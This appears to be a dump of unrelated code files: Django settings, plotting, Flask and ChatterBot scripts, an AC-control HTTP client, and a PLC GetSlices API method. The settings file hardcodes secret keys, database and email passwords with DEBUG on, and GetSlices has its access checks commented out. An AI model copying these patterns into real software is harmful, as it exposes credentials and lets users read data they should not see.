production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '*d7jnjdq6ng4w_u0$ilw5lyd-s&b9y@kb%!cg=jbx1f7hw^r3q'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\n\nALLOWED_HOSTS = ['mac.heinz.cmu.edu']\n\nADMINS = (('hzn', 'benhzn07@gmail.com'),)\n\n# Application definition\n\nINSTALLED_APPS = (\n    'django.contrib.admin',\n    'django.contrib.auth',\n    'django.contrib.contenttypes',\n    'django.contrib.sessions',\n    'django.contrib.messages',\n    'django.contrib.staticfiles',\n    'traffic',\n    # 'kombu.transport.django',\n    # 'djcelery',\n    'django.contrib.gis',\n\n)\n\nMIDDLEWARE_CLASSES = (\n    'django.contrib.sessions.middleware.SessionMiddleware',\n    'django.middleware.common.CommonMiddleware',\n    'django.middleware.csrf.CsrfViewMiddleware',\n    'django.contrib.auth.middleware.AuthenticationMiddleware',\n    'django.contrib.messages.middleware.MessageMiddleware',\n    'django.middleware.clickjacking.XFrameOptionsMiddleware',\n    'project_middleware.authen_middleware.LoginRequiredMiddleware',\n)\n\nROOT_URLCONF = 'dataproject.urls'\n\nWSGI_APPLICATION = 'dataproject.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n\n\n    'default': {\n        'ENGINE': 'django.db.backends.mysql',\n        'NAME': 'dataproject',\n        'USER': 'root',\n        'PASSWORD': 'dataproject',\n        #'HOST': '52.1.172.127',\n        # 'HOST': 'LOCALHOST',\n        'HOST': '128.2.84.231',\n        'PORT': '3306',\n\n    },\n    'psql': {\n        'ENGINE': 'django.contrib.gis.db.backends.postgis',\n        'NAME': 'dataprojectpsql',\n        'USER': 'postgres',\n        'PASSWORD': 'dataproject',\n        'HOST': '128.2.81.222',\n        'PORT': '5432',\n    },\n}\n\n# Router is used to specify which database a model belongs to\nDATABASE_ROUTERS = ['dataproject.router.Router']\n\n# New in Django 1.8\nTEMPLATES = [\n    {\n        'BACKEND': 'django.template.backends.django.DjangoTemplates',\n        'DIRS': [\n            os.path.join(os.path.dirname(__file__), 'traffic.views'),\n        ],\n        'APP_DIRS': True,\n        'OPTIONS': {\n            'debug': DEBUG,\n            'context_processors': [\n                # Insert your TEMPLATE_CONTEXT_PROCESSORS here or use this\n                # list if you haven't customized them:\n                'django.contrib.auth.context_processors.auth',\n                'django.template.context_processors.debug',\n                'django.template.context_processors.i18n',\n                'django.template.context_processors.media',\n                'django.template.context_processors.static',\n                'django.template.context_processors.tz',\n                'django.contrib.messages.context_processors.messages',\n            ],\n        },\n    },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\n# TIME_ZONE = 'America/New_York'\n#\n# USE_I18N = True\n#\n# USE_L10N = True\n\n# No need to use timezone; always use local\nUSE_TZ = False\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\n\n# for login use\nLOGIN_URL = '/traffic/login/'\n\nLOGIN_EXEMPT_URLS = (\n    'traffic/register/',\n    'admin/'\n)\n\n# set sessions to expire when the user closes the browser, this is a global way\n# SESSION_EXPIRE_AT_BROWSER_CLOSE = True\n\n# Email setting, use our gmail to send emails\nEMAIL_USE_TLS = True\n\nEMAIL_HOST = 'smtp.gmail.com'\n\nEMAIL_HOST_USER = 'mdap2205@gmail.com'\n\nEMAIL_HOST_PASSWORD = 'dataproject'\n\nEMAIL_PORT = 
587\n","sub_path":"dataproject/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"387825078","text":"from pathlib import Path\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom itertools import cycle\nimport argparse\nmatplotlib.use(\"Agg\")\n\ncolors = [\"c\", \"r\", \"g\", \"b\", \"m\", 'y', 'k', 'chartreuse', 'coral', 'gold', 'lavender',\n 'silver', 'tan', 'teal', 'wheat', 'orchid', 'orange', 'tomato']\n\nstyles = ['--', '-.', ':', '-']\n\n\ndef parse_args() -> argparse.Namespace:\n parser = argparse.ArgumentParser(description='Plot training metrics')\n parser.add_argument('--folder', type=str, help='Folder to search')\n parser.add_argument('--fontsize', type=int, default=11)\n parser.add_argument('--figsize', type=list, default=[10, 10])\n\n args = parser.parse_args()\n return args\n\n\ndef make_plot(args: argparse.Namespace,\n filename: str) -> None:\n plt.rc('font', size=args.fontsize)\n\n fig = plt.Figure(args.figsize)\n ax = fig.gca()\n\n p = Path(args.folder)\n all_files = p.glob(f'**/{filename}')\n for style, color, filepath in zip(cycle(styles), cycle(colors), all_files):\n array = np.load(filepath)\n n_epochs, iter_per_epoch = array.shape\n\n x = np.linspace(0, n_epochs - 1, (n_epochs * iter_per_epoch))\n y = np.reshape(array, (n_epochs * iter_per_epoch))\n\n label = filepath\n\n ax.plot(x, y, label=label, color=color, linestyle=style)\n\n ax.legend()\n ax.set_xlabel(\"Epochs\")\n ax.set_title(filename.split('.')[0])\n ax.grid(True)\n fig.tight_layout()\n fig.savefig(p.joinpath('{}.png'.format(filename.split('.')[0])))\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n for filename in ['val_mIou.npy', 'val_loss.npy', 'train_mIou.npy', 'train_loss.npy']:\n make_plot(args=args, filename=filename)\n","sub_path":"src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"604104496","text":"from flask import jsonify\nfrom RumboEx.dao.CourseDao import CourseDAO\nfrom RumboEx.dao.taskDao import TaskDAO\nfrom RumboEx.handler.taskHandler import TaskHandler\n\n\nclass CourseHandler():\n\n # get a course with grades and tasks by course id\n def get_course_by_course_id(self, course_id, student_id):\n dao = CourseDAO()\n result = dao.get_course_by_course_id(course_id, student_id)\n if not result:\n return jsonify(Error='NOT FOUND'), 404\n\n course = self.mapToCourseDict(result)\n section_id = result[5]\n enrolled_id = result[6]\n course['time'] = []\n course['grades'] = []\n course['tasks'] = []\n\n # get time schedule of section\n time = dao.get_section_times_by_section_id(section_id)\n if time:\n for t in time:\n course['time'].append(self.mapToTimeDict(t))\n\n # get grades of course\n grades = dao.get_grades_by_enrolled_id(enrolled_id)\n if grades:\n for g in grades:\n print(g)\n course['grades'].append(self.mapToGradeDict(g))\n\n # get tasks of course\n dao2 = TaskDAO()\n tasks = dao2.get_study_tasks_by_user_id_and_course_id(student_id, course['course_id'])\n if tasks:\n for t in tasks:\n course['tasks'].append(self.mapToTaskDict(t))\n\n return jsonify(Course=course)\n\n # get all courses of a student\n def get_courses_by_student_id(self, student_id):\n dao = CourseDAO()\n result = dao.get_courses_by_student_id(student_id)\n if not result:\n return jsonify(Error=\"NOT FOUND\"), 404\n mapped_result = 
[]\n for r in result:\n mapped_result.append(self.mapToCourseDict(r))\n return jsonify(mapped_result)\n\n # get all courses of a student with grades and tasks\n def get_courses_with_grades_by_student_id(self, student_id):\n dao = CourseDAO()\n courses = dao.get_courses_by_student_id(student_id)\n if not courses:\n return jsonify(Error=\"NOT FOUND\"), 404\n mapped_result = []\n for c in courses:\n print(c)\n course = self.mapToCourseDict(c)\n\n section_id = c[5]\n enrolled_id = c[6]\n print(course)\n\n course['time'] = []\n course['grades'] = []\n course['tasks'] = []\n\n # get time schedule of section\n time = dao.get_section_times_by_section_id(section_id)\n if time:\n for t in time:\n course['time'].append(self.mapToTimeDict(t))\n\n # get grades of course\n grades = dao.get_grades_by_enrolled_id(enrolled_id)\n if grades:\n for g in grades:\n print(g)\n course['grades'].append(self.mapToGradeDict(g))\n\n # get tasks of course\n dao2 = TaskDAO()\n tasks = dao2.get_study_tasks_by_user_id_and_course_id(student_id, course['course_id'])\n if tasks:\n for t in tasks:\n course['tasks'].append(self.mapToTaskDict(t))\n\n mapped_result.append(course)\n return jsonify(mapped_result), 200\n\n # def get_course_by_course_id(self, course_id):\n # dao = CourseDAO()\n # result = dao.get_course_by_course_id(course_id)\n # if not result:\n # return jsonify(Error=\"NOT FOUND\"), 404\n # return jsonify(self.mapToIndividualCourseDict(result))\n\n # get all grades of a course\n def get_grades_by_course_id(self, course_id):\n dao = CourseDAO()\n result = dao.get_grades_by_enrolled_id(course_id)\n if not result:\n return jsonify(Error=\"NOT FOUND\"), 404\n mapped_result = []\n for r in result:\n mapped_result.append(self.mapToGradeDict(r))\n return jsonify(mapped_result)\n\n # POST Methods\n\n def insert_grade(self, user_id, form):\n if len(form) < 5:\n return jsonify(Error=\"Malformed post request\"), 400\n else:\n name = form['name']\n grade = form['grade']\n total = form['total']\n weight = form['weight']\n date = form['date']\n course_id = form['course_id']\n if name and course_id:\n dao = CourseDAO()\n grade_id = dao.insert_grade(name, grade, total, weight, date, user_id, course_id)\n # result = self.mapToTaskDict(task_id)\n return jsonify({'grade_id': grade_id[0]}), 200\n else:\n return jsonify(Error=\"Unexpected attributes in post request\"), 400\n\n def insert_course(self, user_id, form):\n codification = form['codification']\n section = form['section_num']\n name = codification\n credits = 0\n professor_id = None\n if codification and section:\n dao = CourseDAO()\n # add course to db\n course_id = dao.insert_course(name, codification, credits, professor_id)\n # add section to db\n section_id = dao.insert_section(section, course_id)\n # enroll student in section\n enrolled_id = dao.add_course_to_student(section_id, user_id)\n return jsonify({'course_id': course_id, 'section_id': section_id, 'enrolled_id': enrolled_id}), 200\n else:\n return jsonify(Error=\"Unexpected attributes in post request\"), 400\n\n # PUT Methods\n\n def changeGradeName(self, grade_id, grade_name):\n response = CourseDAO().change_grade_name(grade_id, grade_name)\n if not response:\n return jsonify(Error='GRADE NOT FOUND'), 404\n result = {'user_id': response[0], 'new_grade_name': response[1]}\n return jsonify(result=result), 200\n\n def changeGradeGrade(self, grade_id, grade):\n response = CourseDAO().change_grade_grade(grade_id, grade)\n if not response:\n return jsonify(Error='GRADE NOT FOUND'), 404\n result = {'user_id': 
response[0], 'new_grade_grade': response[1]}\n return jsonify(result=result), 200\n\n def changeGradeWeight(self, grade_id, grade_weight):\n response = CourseDAO().change_grade_weight(grade_id, grade_weight)\n if not response:\n return jsonify(Error='GRADE NOT FOUND'), 404\n result = {'user_id': response[0], 'new_grade_weight': response[1]}\n return jsonify(result=result), 200\n\n def changeGradeTotal(self, grade_id, grade_total):\n response = CourseDAO().change_grade_total(grade_id, grade_total)\n if not response:\n return jsonify(Error='GRADE NOT FOUND'), 404\n result = {'user_id': response[0], 'new_grade_total': response[1]}\n return jsonify(result=result), 200\n\n def changeGradeDate(self, grade_id, grade_date):\n response = CourseDAO().change_grade_date(grade_id, grade_date)\n if not response:\n return jsonify(Error='GRADE NOT FOUND'), 404\n result = {'user_id': response[0], 'new_grade_date': response[1]}\n return jsonify(result=result), 200\n\n # DELETE\n\n def deleteGrade(self, student_id, grade_id):\n response= CourseDAO().delete_grade(student_id, grade_id)\n if not response:\n return jsonify(Error='Deletion could not be completed'), 500\n result = {'grade_id': response[0]}\n return jsonify(result=result), 200\n\n # Map to Dictionaries\n\n def mapToCourseDict(self, row):\n return {\n 'course_id': row[0],\n 'name': row[1],\n 'codification': row[2],\n 'credits': row[3],\n 'section_num': row[4]\n }\n\n # ???\n # def mapToIndividualCourseDict(self, row):\n # return {\n # 'codification': row[0],\n # 'course_name': row[1],\n # 'professor_id': row[2],\n # 'section': row[3]\n # }\n\n def mapToGradeDict(self, row):\n return {\n 'grade_id': row[0],\n 'name': row[1],\n 'grade': row[2],\n 'total': row[3],\n 'weight': row[4],\n 'date': row[5]\n }\n\n def mapToTimeDict(self, row):\n return {\n 'day': row[0],\n 'start': row[1],\n 'end': row[2]\n }\n\n def mapToTaskDict(self, row):\n return {\n 'task_id': row[0],\n 'title': row[1],\n 'description': row[2],\n 'start': row[3],\n 'end': row[4],\n 'finished': row[5]\n }\n","sub_path":"RumboEx/handler/CourseHandler.py","file_name":"CourseHandler.py","file_ext":"py","file_size_in_byte":8544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"555634928","text":"from chatterbot import ChatBot\nfrom chatterbot.trainers import ListTrainer\nimport logging\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\nfrom chatterbot.response_selection import get_most_frequent_response\nfrom chatterbot.response_selection import get_first_response\nfrom chatterbot.response_selection import get_random_response\nfrom chatterbot.logic.logic_adapter import LogicAdapter\nfrom pytz import UTC\nfrom datetime import datetime\nfrom dateutil import parser as date_parser\n\n\nfrom chatterbot.adapters import Adapter\nfrom chatterbot.storage import StorageAdapter\nfrom chatterbot.search import IndexedTextSearch\nfrom chatterbot.conversation import Statement\nfrom chatterbot.comparisons import JaccardSimilarity\nfrom chatterbot.conversation import StatementMixin\n\n\n\n\nfrom chatterbot import utils\nfrom chatterbot import languages\nfrom nltk.corpus import wordnet, stopwords\n#logging.basicConfig(level=logging.INFO)\n\n\n\n\n\n\n\n\n\ndef get_feedback():\n\n text = input()\n\n if 'yes' in text.lower():\n return True\n elif 'no' in text.lower():\n return False\n else:\n print('Please type either \"Yes\" or \"No\"')\n return get_feedback()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nbot = ChatBot(\n \"Terminal\",\n 
storage_adapter=\"chatterbot.storage.SQLStorageAdapter\",\n logic_adapters=[\n \t\n\t\t\"chatterbot.logic.MathematicalEvaluation\",\n\t\t\"chatterbot.logic.BestMatch\"\n\t\t\n\t\t\n \n ],\n \n input_adapter=\"chatterbot.input.TerminalAdapter\",\n output_adapter=\"chatterbot.output.TerminalAdapter\",\n database=\"../database.db\"\n \n)\n\n\n\n\n\n\ntrainer = ListTrainer(bot)\n\n\n\n#trainer = ChatterBotCorpusTrainer(bot)\n\n\ntrainer.train([\n \"Hi\",\n \"Hello!\",\n \"Hi there!\",\n \"Hello!\",\n \"Hello\",\n \"Hello!\",\n])\n\ntrainer.train([\n \"How are you ?\",\n \"I am fine you ?\",\n])\n\n\ntrainer.train([\n \"Thank you.\",\n \"No problem, how may I help you ?\",\n \"Thanks.\",\n \"No problem, how may I help you ?\",\n])\n\ntrainer.train([\n \"Exam dates ?\",\n \"Dates are : 21.01.2021\",\n])\n\ntrainer.train([\n 'when are the exams?',\n 'they start tomorrow',\n 'do we have any exams coming up?',\n 'tomorrow',\n 'when are we having our exams?',\n 'tomorrow',\n 'when are the exams expected to begin?',\n 'tomorrow'\n])\n\ntrainer.train([\n \"When does the finals week start?\",\n \"Finals week start at January 13, 2021.\",\n \"Thanks\"\n \"Can I help you with something else?\",\n])\n\ntrainer.train([\n \"What are exam dates?\",\n \"Exam dates are : 21.01.2021\",\n \"Exam dates?\",\n \"Exam dates are : 21.01.2021\",\n \"What is the exam dates?\",\n \"Exam dates are : 21.01.2021\",\n \"Dates for the exams?\",\n \"Exam dates are : 21.01.2021\",\n \n])\n\ntrainer.train([\n 'when should I start my internship?',\n 'after the 2nd semester',\n 'when do internships usually start?',\n 'after the second semester',\n 'when am I expected to start my internship?',\n 'after the 2nd semester',\n 'when do students start their internships?',\n 'after the 2nd semester',\n 'when should we start our internship?',\n 'after the 2nd semester'\n])\n\ntrainer.train([\n 'what is it that you do?',\n 'I am an AI ChatBot for Ankara University',\n 'what are you?',\n 'I am an AI ChatBot for Ankara University',\n 'what is your purpose?',\n 'I am an AI ChatBot for Ankara University',\n 'what are your main functions?',\n 'I am an AI ChatBot for Ankara University'\n])\n\n\n\ntrainer.train([\n \"Can i get professor contact info\",\n \"Who would you like to get contact info of? (James Smith or Sarah Parks?)\",\n \"Professor info\",\n \"Who would you like to get contact info of? (James Smith or Sarah Parks?)\",\n \"Professor contact info\",\n \"Who would you like to get contact info of? (James Smith or Sarah Parks?)\",\n \"professor info\",\n \"Who would you like to get contact info of? (James Smith or Sarah Parks?)\",\n \"professor contact info\",\n \"Who would you like to get contact info of? 
(James Smith or Sarah Parks?)\",\n \"James Smith\",\n \"James Smith Phone: 555-666-7788, e-Mail: jamessmith@mail.com\",\n \"james smith\",\n \"James Smith Phone: 555-666-7788, e-Mail: jamessmith@mail.com\",\n \"Sarah Parks\",\n \"Sarah Parks Phone: 555-444-3322, e-Mail: sarahparks@mail.com\",\n \"sarah parks\",\n \"Sarah Parks Phone: 555-444-3322, e-Mail: sarahparks@mail.com\"\n\n])\n\ntrainer.train([\n \"Can i get my student certificate\",\n \"Name: Arthur Dent'-----'Student ID: 182959'-----'Department: Computer Engineering'-----'Grade: 3'-----'This student is currently enrolled in Computer Engineering Department.\",\n \"Can I get student certificate\",\n \"Name: Arthur Dent'-----'Student ID: 182959'-----'Department: Computer Engineering'-----'Grade: 3'-----'This student is currently enrolled in Computer Engineering Department.\",\n \"Student certificate\",\n \"Name: Arthur Dent'-----'Student ID: 182959'-----'Department: Computer Engineering'-----'Grade: 3'-----'This student is currently enrolled in Computer Engineering Department.\",\n \"student certificate\",\n \"Name: Arthur Dent'-----'Student ID: 182959'-----'Department: Computer Engineering'-----'Grade: 3'-----'This student is currently enrolled in Computer Engineering Department.\",\n\n])\n\ntrainer.train([\n \"Hey AnkuBot. Are you sentient?\",\n \"Robots should die.\"\n\n])\n\n\n\n\n#Var.compare('cat is very hungry.','Deniz is very hungry.')\n\n\n#print('value:',c)\n\n#trainer.train(\n# \"chatterbot.corpus.english\"\n#)\n\n#chatbot = ChatBot(\"Johnny Five\", read_only=True)\n\n# Create a new instance of a ChatBot\n\n#response_selection_method=get_most_frequent_response\n\n\nprint('Hello there, I am Ankara University ChatBot. How may I help you ?')\n\n\n\n\n\n\n\n'''\nA =Statement(\"cat very hungry.\")\nB =Statement(\"the young cat hungry.\")\nVar = JaccardSimilarity()\n\nc = JaccardSimilarity().compare(A,B)\n'''\n\n\n\nwhile True:\n\ttry:\t\n\t\t\n\t\ttext=input('User: ')\n\t\tif(text=='quit' or text=='exit'):\n\t\t\tbreak\n\t\t\n\t\t\n\t\tinput_statement = Statement(text)\n\t\tresponse = bot.get_response(input_statement)\n\t\t\n\t\t\n\t\t\n\n\t\tif(response.confidence < 0.60):\n\t\t\tprint(\"\\nThis answer has a low confidence level\\n\")\n\t\t\tprint('Confidence Number :',response.confidence)\n\t\t\tprint('\\n Is \"{}\" a coherent response to \"{}\"? 
\\n'.format(response.text,input_statement.text))\n \t\t\n \t\t\n\t\t\t\n\t\t\tif get_feedback() is True:\n\t\t\t\tprint('Confidence level increased!')\n\t\t\t\tbot.learn_response(response, input_statement)\n\t\t\t\t\n\t\t\t\t\n \t\t \n\t\t\telse:\n\t\t\t\tprint('please input the correct one')\n\t\t\t\tA=Statement(input('User: '))\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t#A.save()\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tbot.learn_response(A, input_statement)\n\t\t\t\tprint('Responses added to bot!')\n\t\n\t\tif(response.confidence > 0.60):\n\t\t\tprint(\"This answer has a high confidence level\\n\")\n\t\t\tprint('Confidence Number :',response.confidence)\n\t\t\tprint('\\n',response)\n \t\n\t\t\n \n \n \n \n \n # Press ctrl-c or ctrl-d on the keyboard to exit\n\texcept (KeyboardInterrupt, EOFError, SystemExit):\n\t\tbreak\n\n\n\n\n\n\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","sub_path":"ankuchatbot.py","file_name":"ankuchatbot.py","file_ext":"py","file_size_in_byte":7040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"310104209","text":"from django.conf.urls import patterns, include, url\n\nfrom cpracownik import views\n\n \nurlpatterns = patterns('',\n #lista pokjow dla pracownikow\n #url(r'^$', views.PracView.as_view(), name='pracList'),\n url(r'^$', 'cpracownik.views.pracview', name='pracList'),\n url(r'^pracownik/(?P<pk>\\d+)/$', 'cpracownik.views.lista', name = 'praclist'),\n url(r'^usun/(?P<idk>\\d+)/$', 'cpracownik.views.usuwa', name = 'usun'),\n url(r'^infoform/$', 'cpracownik.views.infoform', name = 'form'),\n url(r'^infoList/$', 'cpracownik.views.infoview', name = 'infoList'),\n url(r'^usunInfo/(?P<pk>\\d+)/$', 'cpracownik.views.usunInfo', name = 'usunInfo'),\n\n)","sub_path":"cpracownik/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"247738403","text":"from math import sqrt\r\n\r\nst = input()\r\nsize = len(st)\r\nsq = int(sqrt(size))\r\nminArea = 2*size\r\nminRows = 0\r\nminCols = 2*size\r\nfor i in range(1, 3*sq):\r\n for j in range(i, 3*sq):\r\n if i*j < size:\r\n continue\r\n else:\r\n if j-i < minCols-minRows:\r\n minArea = i*j\r\n minRows = i\r\n minCols = j\r\n break\r\noutput = ''\r\nfor j in range(minCols):\r\n for i in range(minRows):\r\n val = minCols*i+j\r\n if val < len(st):\r\n output += st[val]\r\n output += ' '\r\nprint(output)","sub_path":"Algorithms/Implementation/encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"238304652","text":"import json\nimport requests\n\nURL = 'http://127.0.0.1:8088/todo/api/v1.0'\nTASKID = '1'\n\n\ndef get_requests(url):\n \"\"\"GET请求\"\"\"\n url = url +'/tasks'\n\n headers = {\n 'Content-Type': \"application/json\",\n 'Accept-Charset': \"utf-8\",\n }\n\n response = requests.request(\"GET\", url, headers=headers)\n print(response.text)\n\ndef post_requests(url):\n \"\"\"POST请求\"\"\"\n url = url + '/tasks'\n payload = {\n \"description\": \"python for data analysis\",\n \"done\": False,\n \"title\": \"Read a book\"\n }\n\n headers = {\n 'Content-Type': \"application/json\",\n 'Accept-Charset': \"utf-8\",\n }\n\n response = requests.request(\"POST\", url,data = json.dumps(payload), headers=headers)\n print(response.text)\n\ndef getone_requests(url,id):\n \"\"\"GET请求\"\"\"\n url = url + 
'/tasks/' + id\n\n headers = {\n 'Content-Type': \"application/json\",\n 'Accept-Charset': \"utf-8\",\n }\n\n response = requests.request(\"GET\", url, headers=headers)\n print(response.text)\n\ndef put_requests(url,id):\n \"\"\"PUT请求\"\"\"\n url = url + '/tasks/' + id\n payload = {\n \"description\": \"data warnging with pandas\",\n \"done\": True,\n \"title\": \"Ipython\"\n }\n\n headers = {\n 'Content-Type': \"application/json\",\n 'Accept-Charset': \"utf-8\",\n }\n\n response = requests.request(\"PUT\", url, data=json.dumps(payload), headers=headers)\n print(response.text)\n\ndef delete_requests(url,id):\n \"\"\"DELETE请求\"\"\"\n url = url + '/tasks/' + id\n headers = {\n 'Content-Type': \"application/json\",\n 'Accept-Charset': \"utf-8\",\n }\n\n response = requests.request(\"DELETE\", url, headers=headers)\n print(response.text)\n\nif __name__ == '__main__':\n #get_requests(URL)\n post_requests(URL)\n #getone_requests(URL, TASKID)\n #put_requests(URL, TASKID)\n #delete_requests(URL, TASKID)\n","sub_path":"apidemo.py","file_name":"apidemo.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"439042495","text":"import theano\nimport theano.tensor as T\nimport numpy as np\nimport numpy.random as rng\n\nclass HiddenLayer: \n\n def __init__(self, num_in, num_out, W, b, activation = None, batch_norm = False): \n\n self.activation = activation\n self.batch_norm = batch_norm\n\n self.residual = (num_in == num_out)\n\n self.W = W\n self.b = b\n\n def output(self, input_raw):\n\n input = input_raw\n\n lin_output = T.dot(input, self.W) + self.b\n\n if self.batch_norm:\n lin_output = (lin_output - T.mean(lin_output, axis = 0, keepdims = True)) / (1.0 + T.std(lin_output, axis = 0, keepdims = True))\n lin_output += self.b\n\n self.out_store = lin_output\n\n if self.activation == None: \n activation = lambda x: x\n elif self.activation == \"relu\": \n activation = lambda x: T.maximum(0.0, x)\n elif self.activation == \"exp\": \n activation = lambda x: T.exp(x)\n elif self.activation == \"tanh\":\n activation = lambda x: T.tanh(x)\n elif self.activation == 'softplus':\n activation = lambda x: T.nnet.softplus(x)\n else: \n raise Exception(\"Activation not found\")\n\n out = activation(lin_output)\n\n return out\n\n\n\n\n","sub_path":"lib/HiddenLayer.py","file_name":"HiddenLayer.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"622648125","text":"# Copyright 2021 Kamil Sroka\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport httpx\nfrom dataclasses import dataclass\n\n@dataclass\nclass ToshibaAcClientInfo:\n device_id: str\n sas_token: str\n\n@dataclass\nclass ToshibaAcDeviceInfo:\n ac_id: str\n ac_unique_id: str\n ac_name: str\n\nclass ToshibaAcHttpApi:\n BASE_URL = 'https://toshibamobileservice.azurewebsites.net'\n LOGIN_PATH = '/api/Consumer/Login'\n REGISTER_PATH = 
'/api/Consumer/RegisterMobileDevice'\n AC_MAPPING_PATH = '/api/AC/GetConsumerACMapping'\n STATUS_PATH = '/api/AC/GetCurrentACState'\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n self.access_token = None\n self.access_token_type = None\n self.consumer_id = None\n\n async def request_api(self, path, get=None, post=None, headers=None):\n if not headers:\n headers = {}\n headers['Content-Type'] = 'application/json'\n headers['Authorization'] = self.access_token_type + ' ' + self.access_token\n\n url = self.BASE_URL + path\n\n async with httpx.AsyncClient() as client:\n if post:\n res = await client.post(url, params=get, json=post, headers=headers)\n else:\n res = await client.get(url, params=get, headers=headers)\n\n return res.json()['ResObj']\n\n async def connect(self):\n headers = {'Content-Type': 'application/json'}\n post = {'Username': self.username, 'Password': self.password}\n\n res = await self.request_api(self.LOGIN_PATH, post=post, headers=headers)\n\n self.access_token = res['access_token']\n self.access_token_type = res['token_type']\n self.consumer_id = res['consumerId']\n\n async def get_devices(self):\n get = {\n 'consumerId': self.consumer_id\n }\n\n res = await self.request_api(self.AC_MAPPING_PATH, get=get)\n\n devices = []\n\n for group in res:\n for device in group['ACList']:\n devices.append(ToshibaAcDeviceInfo(device['Id'], device['DeviceUniqueId'], device['Name']))\n\n return devices\n\n async def get_device_state(self, ac_unique_id):\n get = {\n \"ACId\": ac_unique_id,\n }\n\n res = await self.request_api(self.STATUS_PATH, get=get)\n\n return res['ACStateData']\n\n\n async def register_client(self):\n post = {\n 'DeviceID': self.username + '_3e6e4eb5f0e5aa46',\n 'DeviceType': '1',\n 'Username': self.username\n }\n\n res = await self.request_api(self.REGISTER_PATH, post=post)\n\n return ToshibaAcClientInfo(res['DeviceId'], res['SasToken'])\n","sub_path":"toshiba_ac/http_api.py","file_name":"http_api.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"386740064","text":"from PLC.Method import Method\nfrom PLC.Parameter import Parameter, Mixed\nfrom PLC.Filter import Filter\nfrom PLC.Auth import Auth\nfrom PLC.Persons import Person, Persons\nfrom PLC.Nodes import Nodes\nfrom PLC.Sites import Site, Sites\nfrom PLC.Slices import Slice, Slices\n\nclass GetSlices(Method):\n \"\"\"\n Returns an array of structs containing details about slices. If\n slice_filter is specified and is an array of slice identifiers or\n slice names, or a struct of slice attributes, only slices matching\n the filter will be returned. If return_fields is specified, only the\n specified details will be returned.\n\n Users may only query slices of which they are members. PIs may\n query any of the slices at their sites. Admins and nodes may query\n any slice. 
If a slice that cannot be queried is specified in\n slice_filter, details about that slice will not be returned.\n \"\"\"\n\n roles = ['admin', 'pi', 'user', 'node']\n\n accepts = [\n Auth(),\n Mixed([Mixed(Slice.fields['slice_id'],\n Slice.fields['name'])],\n Parameter(str,\"name\"),\n Parameter(int,\"slice_id\"),\n Filter(Slice.fields)),\n Parameter([str], \"List of fields to return\", nullok = True)\n ]\n\n returns = [Slice.fields]\n\n def call(self, auth, slice_filter = None, return_fields = None):\n # If we are not admin, make sure to return only viewable\n # slices.\n# if isinstance(self.caller, Person) and \\\n# 'admin' not in self.caller['roles']:\n# # Get slices that we are able to view\n# valid_slice_ids = self.caller['slice_ids']\n# # pis can view all slices at their site\n# if 'pi' in self.caller['roles'] and self.caller['site_ids']:\n# sites = Sites(self.api, self.caller['site_ids'])\n# for site in sites:\n# valid_slice_ids += site['slice_ids']\n# # techs can view all slices on the nodes at their site\n# if 'tech' in self.caller['roles'] and self.caller['site_ids']:\n# nodes = Nodes(self.api, {'site_id': self.caller['site_ids']}, ['site_id', 'slice_ids'])\n# for node in nodes:\n# valid_slice_ids.extend(node['slice_ids'])\n#\n# if not valid_slice_ids:\n# return []\n#\n# if slice_filter is None:\n# slice_filter = valid_slice_ids\n\n # Must query at least slice_id (see below)\n if return_fields is not None and 'slice_id' not in return_fields:\n return_fields.append('slice_id')\n added_fields = True\n else:\n added_fields = False\n\n slices = Slices(self.api, slice_filter, return_fields)\n\n # Filter out slices that are not viewable\n# if isinstance(self.caller, Person) and \\\n# 'admin' not in self.caller['roles']:\n# slices = [slice for slice in slices if slice['slice_id'] in valid_slice_ids]\n\n # Remove slice_id if not specified\n if added_fields:\n for slice in slices:\n if 'slice_id' in slice:\n del 